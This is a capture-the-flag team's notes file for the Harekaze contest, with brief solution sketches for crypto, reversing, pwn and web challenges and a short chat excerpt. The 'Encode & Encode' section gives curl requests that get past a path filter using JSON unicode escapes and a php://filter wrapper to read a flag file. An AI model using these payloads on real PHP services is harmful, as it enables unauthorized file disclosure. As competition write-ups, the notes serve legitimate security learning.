* DONE Welcome [Misc 10]
Solved: wasamasa
- Copy and paste that flag!
* DONE scramble [Reversing 100]
Solved: Oblivion
- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code
* DONE ONCE UPON A TIME [Crypto 100]
Solved: WTFH4X
- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there's four possible ways it has
been created (since it's two parts and randomization allows each to
happen two ways)
- I have no idea how to solve linear algebra problems :(
* DONE Baby ROP [Pwn 100]
Solved: semchapeu
* TODO The Steganography Generator [Reversing 200]
- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the
flag
* DONE Twenty-five [Crypto 100]
Solved: wasamasa
- Goal: Translate crypto.txt to valid perl code
- I did forego frequency analysis and instead looked for
unusual/unique words among the reserved keywords list
- =qq= is a good start, from then one one can guess =qx= and continue
until figuring out all letters
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment
out =eval($text);=
- Evaluating the fully translated code will print the flag
* DONE Encode & Encode [Web 100]
Solved: wasamasa
- The key insight here is that the check is done before JSON decoding
- So, you can enter something not matching the filter, but which
decodes into something exfiltrating the flag
- A second bypass is required, for this you can use the same trick to
invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...
#+BEGIN_SRC shell-script
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}'
http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}'
http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}'
http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}'
http://problem.harekaze.com:10001/query.php
#+END_SRC
* DONE Baby ROP 2 [Pwn 200]
Solved: semchapeu
* TODO show me your private key [Crypto 200]
- I don't understand ECC at all
- I should learn some sagemath
* TODO Admin's Product key [Reversing 200]
- No clue
* TODO Login System [Pwn 200]
- semchapeu is taking this one on
* TODO Easy Notes [Web 200]
- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?
* DONE [a-z().] [Misc 200]
Solved: WTFH4X
- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There's some top-level functions with short names like
=console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a
=node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat=
on lengths
- This together with a short enough primitive for 8 and 7 gives you
the following term: 7*((8+8+7)*8+7)
* DONE Now We Can Play!! [Crypto 200]
Solved: WTFH4X
- Some funky crypto exchange
* TODO One Quadrillion [Crypto 200]
- Some unreadable hashing function
* TODO Harekaze Note [Pwn 300]
- semchapeu is taking this one on
* DONE Avatar Uploader 1 [Misc 100]
Solved: wasamasa
- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:
#+BEGIN_SRC shell-script
convert xc:red -size 1x1 1x1.png
head -c20 1x1.png > broken.png
#+END_SRC
* TODO Avatar Uploader 2 [Web 300]
- The flag is in the file system, so some exfiltration is required
* TODO Ramen [Pwn 400]
- I'll let semchapeu deal with this
* TODO SQLite Voting [Web 350]
- SQL injection, but not was we know it
- The most severe restriction is no whitespace, followed by none of
the usual characters
- You only get a binary response back
* Other
08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17): x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that